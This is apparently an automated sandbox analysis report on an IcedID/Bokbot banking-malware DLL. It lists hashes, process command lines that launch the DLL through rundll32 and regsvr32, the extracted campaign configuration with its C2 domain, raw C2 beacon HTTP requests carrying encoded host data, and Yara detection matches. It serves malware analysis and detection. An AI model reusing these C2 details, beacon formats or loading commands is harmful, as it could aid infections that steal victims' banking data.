Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
J5V5DR.dll

Overview

General Information

Sample Name:J5V5DR.dll
Analysis ID:632638
MD5:9b692f43d575acb739decfc809db7f2e
SHA1:bc42c60590cb908e765e2d97e8b3a92b4616cd30
SHA256:0581f0bf260a11a5662d58b99a82ec756c9365613833bce8f102ec1235a7d4f7
Tags:dllexeIcedID
Infos:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected IcedID
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Yara signature match
Tries to load missing DLLs
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Registers a DLL
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality for execution timing, often used to detect debuggers

Classification

  • System is w10x64
  • loaddll64.exe (PID: 6832 cmdline: loaddll64.exe "C:\Users\user\Desktop\J5V5DR.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 6840 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 6860 cmdline: rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 6848 cmdline: regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 6868 cmdline: rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6920 cmdline: rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,HdQZgnE MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 7092 cmdline: rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,IfkPmdu MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
{"Campaign ID": 109932505, "C2 url": "ilekvoyn.com"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
    00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
      00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
        00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_IcedID_6Yara detected IcedIDJoe Security
          00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
            Click to see the 10 entries
            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.1ede3f59841.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
            • 0x1bd0:$internal_name: loader_dll_64.dll
            • 0x1f08:$string6: WINHTTP.dll
            • 0x1bf4:$string7: DllRegisterServer
            • 0x1c06:$string8: PluginInit
            4.2.rundll32.exe.1ede3fcb648.2.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
            • 0x1bd0:$internal_name: loader_dll_64.dll
            • 0x1f08:$string6: WINHTTP.dll
            • 0x1bf4:$string7: DllRegisterServer
            • 0x1c06:$string8: PluginInit
            0.2.loaddll64.exe.239d139d591.2.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
            • 0x1bd0:$internal_name: loader_dll_64.dll
            • 0x1f08:$string6: WINHTTP.dll
            • 0x1bf4:$string7: DllRegisterServer
            • 0x1c06:$string8: PluginInit
            2.2.regsvr32.exe.180000000.2.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
            • 0x27d0:$internal_name: loader_dll_64.dll
            • 0x3198:$string0: _gat=
            • 0x3048:$string1: _ga=
            • 0x30a0:$string2: _gid=
            • 0x3118:$string3: _u=
            • 0x303a:$string4: _io=
            • 0x3054:$string5: GetAdaptersInfo
            • 0x2b08:$string6: WINHTTP.dll
            • 0x27f4:$string7: DllRegisterServer
            • 0x2806:$string8: PluginInit
            • 0x3134:$string9: POST
            2.2.regsvr32.exe.180000000.2.unpackJoeSecurity_IcedID_6Yara detected IcedIDJoe Security
              Click to see the 47 entries
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: IcedID {"Campaign ID": 109932505, "C2 url": "ilekvoyn.com"}
              Source: J5V5DR.dllVirustotal: Detection: 13%Perma Link
              Source: J5V5DR.dllReversingLabs: Detection: 12%
              Source: Yara matchFile source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 6832, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6848, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6868, type: MEMORYSTR
              Source: Yara matchFile source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE
              Source: J5V5DR.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

              Networking

              barindex
              Source: C:\Windows\System32\rundll32.exeDomain query: ilekvoyn.com
              Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.182.2 80
              Source: Malware configuration extractorURLs: ilekvoyn.com
              Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:38333943384646433645323531353035; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:31323037463731444444363041413743; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:45324342413344443837343036393933; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3929:119; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:37383344384639433838463446394437; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 May 2022 19:00:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 May 2022 19:00:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 May 2022 19:00:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 May 2022 19:00:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0
              Source: loaddll64.exe, 00000000.00000002.306399602.00000239D2CF0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279011932.000001D397AA0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.279346138.000001EDE5CF0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ilekvoyn.com/
              Source: rundll32.exe, 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ilekvoyn.com/4
              Source: rundll32.exe, 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ilekvoyn.com/Y
              Source: rundll32.exe, 00000004.00000002.279383760.000001EDE5D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ilekvoyn.com/u5
              Source: regsvr32.exe, 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ilekvoyn.com:80/
              Source: loaddll64.exe, 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shapka-youtube.ru/
              Source: unknownDNS traffic detected: queries for: ilekvoyn.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:38333943384646433645323531353035; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:31323037463731444444363041413743; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:45324342413344443837343036393933; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3929:119; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:37383344384639433838463446394437; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 6832, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6848, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6868, type: MEMORYSTR
              Source: Yara matchFile source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE

              System Summary

              barindex
              Source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
              Source: 4.2.rundll32.exe.1ede3f59841.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 4.2.rundll32.exe.1ede3fcb648.2.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 0.2.loaddll64.exe.239d139d591.2.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 3.2.rundll32.exe.1d395c5b848.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 2.2.regsvr32.exe.b99811.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 2.2.regsvr32.exe.c091b8.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 3.2.rundll32.exe.1d395be9aa1.2.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 0.2.loaddll64.exe.239d1412178.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
